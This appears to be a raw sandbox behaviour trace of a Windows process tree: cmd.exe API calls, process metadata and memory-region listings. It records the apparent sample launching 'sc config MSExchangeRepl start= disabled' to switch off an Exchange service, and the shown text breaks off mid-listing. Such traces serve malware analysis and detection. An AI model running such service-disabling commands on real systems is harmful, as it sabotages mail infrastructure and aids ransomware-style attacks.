[0132.506] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.506] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.506] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.506] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.506] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.506] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.506] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.506] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.506] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.506] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.506] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.506] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.506] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.506] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.506] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.506] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.506] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.506] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.506] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.506] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.506] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.506] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.506] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.506] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.506] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.506] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.506] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.507] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.507] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.507] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.507] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.507] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.507] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.507] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.507] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.507] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.507] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.507] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.507] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.507] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.507] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.507] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.507] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.507] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.507] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.507] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.507] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.507] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.507] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.507] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.507] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.507] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.507] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.507] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.507] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.507] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.507] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.507] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.507] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.507] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0132.507] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0132.507] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0132.507] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0132.507] SetErrorMode (uMode=0x0) returned 0x0 [0132.507] SetErrorMode (uMode=0x1) returned 0x0 [0132.507] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47b05d0, lpFilePart=0x45eefac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x45eefac*="Desktop") returned 0x1d [0132.508] SetErrorMode (uMode=0x0) returned 0x1 [0132.508] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.508] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.515] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.515] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.515] GetConsoleTitleW (in: lpConsoleTitle=0x45ef22c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.515] InitializeProcThreadAttributeList (in: lpAttributeList=0x45ef158, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x45ef13c | out: lpAttributeList=0x45ef158, lpSize=0x45ef13c) returned 1 [0132.515] UpdateProcThreadAttribute (in: lpAttributeList=0x45ef158, dwFlags=0x0, Attribute=0x60001, lpValue=0x45ef144, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x45ef158, lpPreviousValue=0x0) returned 1 [0132.515] GetStartupInfoW (in: lpStartupInfo=0x45ef190 | out: lpStartupInfo=0x45ef190*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.516] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.516] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.517] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeRepl start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x45ef0e0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeRepl start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x45ef12c | out: lpCommandLine="sc config MSExchangeRepl start= disabled", lpProcessInformation=0x45ef12c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc98, dwThreadId=0xca0)) returned 1 [0132.523] CloseHandle (hObject=0xa4) returned 1 [0132.523] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.523] GetEnvironmentStringsW () returned 0x47b9f00* [0132.523] FreeEnvironmentStringsA (penv="=") returned 1 [0132.523] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0132.569] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x45ef0c4 | out: lpExitCode=0x45ef0c4*=0x424) returned 1 [0132.569] CloseHandle (hObject=0xa8) returned 1 [0132.569] _vsnwprintf (in: _Buffer=0x45ef1ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x45ef0cc | out: _Buffer="00000424") returned 8 [0132.569] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0132.569] GetEnvironmentStringsW () returned 0x47bb378* [0132.569] FreeEnvironmentStringsA (penv="=") returned 1 [0132.569] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.569] GetEnvironmentStringsW () returned 0x47bb378* [0132.569] FreeEnvironmentStringsA (penv="=") returned 1 [0132.569] DeleteProcThreadAttributeList (in: lpAttributeList=0x45ef158 | out: lpAttributeList=0x45ef158) [0132.569] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.569] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.570] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.570] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.570] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.570] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.570] SetConsoleInputExeNameW () returned 0x1 [0132.570] GetConsoleOutputCP () returned 0x1b5 [0132.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.570] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.570] exit (_Code=1060) Thread: id = 520 os_tid = 0xc8c Process: id = "156" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2747f000" os_pid = "0xc80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "155" os_parent_pid = "0xe54" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8295 start_va = 0x7fe92000 end_va = 0x7fe92fff entry_point = 0x0 region_type = private name = "private_0x000000007fe92000" filename = "" Region: id = 8296 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8297 start_va = 0x9e533c0000 end_va = 0x9e533dffff entry_point = 0x0 region_type = private name = "private_0x0000009e533c0000" filename = "" Region: id = 8298 start_va = 0x9e533e0000 end_va = 0x9e533f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e533e0000" filename = "" Region: id = 8299 start_va = 0x9e53400000 end_va = 0x9e5343ffff entry_point = 0x0 region_type = private name = "private_0x0000009e53400000" filename = "" Region: id = 8300 start_va = 0x7df5ffce0000 end_va = 0x7ff5ffcdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffce0000" filename = "" Region: id = 8301 start_va = 0x7ff6c4220000 end_va = 0x7ff6c4242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4220000" filename = "" Region: id = 8302 start_va = 0x7ff6c4245000 end_va = 0x7ff6c4245fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4245000" filename = "" Region: id = 8303 start_va = 0x7ff6c424e000 end_va = 0x7ff6c424ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c424e000" filename = "" Region: id = 8304 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8305 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8306 start_va = 0x9e533c0000 end_va = 0x9e533cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e533c0000" filename = "" Region: id = 8307 start_va = 0x9e533d0000 end_va = 0x9e533d6fff entry_point = 0x0 region_type = private name = "private_0x0000009e533d0000" filename = "" Region: id = 8308 start_va = 0x9e53440000 end_va = 0x9e534fdfff entry_point = 0x9e53440000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8309 start_va = 0x9e53500000 end_va = 0x9e5353ffff entry_point = 0x0 region_type = private name = "private_0x0000009e53500000" filename = "" Region: id = 8310 start_va = 0x9e53540000 end_va = 0x9e53540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e53540000" filename = "" Region: id = 8311 start_va = 0x9e53550000 end_va = 0x9e53556fff entry_point = 0x0 region_type = private name = "private_0x0000009e53550000" filename = "" Region: id = 8312 start_va = 0x9e53560000 end_va = 0x9e53560fff entry_point = 0x0 region_type = private name = "private_0x0000009e53560000" filename = "" Region: id = 8313 start_va = 0x9e53570000 end_va = 0x9e53570fff entry_point = 0x0 region_type = private name = "private_0x0000009e53570000" filename = "" Region: id = 8314 start_va = 0x9e53600000 end_va = 0x9e536fffff entry_point = 0x0 region_type = private name = "private_0x0000009e53600000" filename = "" Region: id = 8315 start_va = 0x9e53700000 end_va = 0x9e53887fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e53700000" filename = "" Region: id = 8316 start_va = 0x9e538c0000 end_va = 0x9e538cffff entry_point = 0x0 region_type = private name = "private_0x0000009e538c0000" filename = "" Region: id = 8317 start_va = 0x9e538d0000 end_va = 0x9e53a50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e538d0000" filename = "" Region: id = 8318 start_va = 0x9e53a60000 end_va = 0x9e54e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e53a60000" filename = "" Region: id = 8319 start_va = 0x7ff6c4120000 end_va = 0x7ff6c421ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4120000" filename = "" Region: id = 8320 start_va = 0x7ff6c424c000 end_va = 0x7ff6c424dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c424c000" filename = "" Region: id = 8321 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8322 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8323 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8324 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8325 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8326 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8327 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8328 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8329 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8330 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8331 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8332 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8333 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8334 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 517 os_tid = 0xd08 Thread: id = 518 os_tid = 0x9a4 Thread: id = 519 os_tid = 0xd00 Process: id = "157" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x2773b000" os_pid = "0xc98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "155" os_parent_pid = "0xe54" cmd_line = "sc config MSExchangeRepl start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8348 start_va = 0x7f0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 8349 start_va = 0x810000 end_va = 0x811fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 8350 start_va = 0x820000 end_va = 0x833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 8351 start_va = 0x840000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 8352 start_va = 0x880000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 8353 start_va = 0x8c0000 end_va = 0x8c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 8354 start_va = 0x8d0000 end_va = 0x8d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 8355 start_va = 0x8e0000 end_va = 0x8e1fff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 8356 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8357 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8358 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8359 start_va = 0x7e840000 end_va = 0x7e862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e840000" filename = "" Region: id = 8360 start_va = 0x7e869000 end_va = 0x7e86bfff entry_point = 0x0 region_type = private name = "private_0x000000007e869000" filename = "" Region: id = 8361 start_va = 0x7e86c000 end_va = 0x7e86cfff entry_point = 0x0 region_type = private name = "private_0x000000007e86c000" filename = "" Region: id = 8362 start_va = 0x7e86f000 end_va = 0x7e86ffff entry_point = 0x0 region_type = private name = "private_0x000000007e86f000" filename = "" Region: id = 8363 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8364 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8365 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8366 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8367 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8368 start_va = 0x940000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 8369 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8370 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8371 start_va = 0xa00000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 8372 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8373 start_va = 0x7f0000 end_va = 0x7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 8374 start_va = 0x800000 end_va = 0x803fff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 8375 start_va = 0x8f0000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 8376 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 8377 start_va = 0xb00000 end_va = 0xbbdfff entry_point = 0xb00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8378 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 8379 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8380 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8381 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8382 start_va = 0x76970000 end_va = 0x76ae5fff entry_point 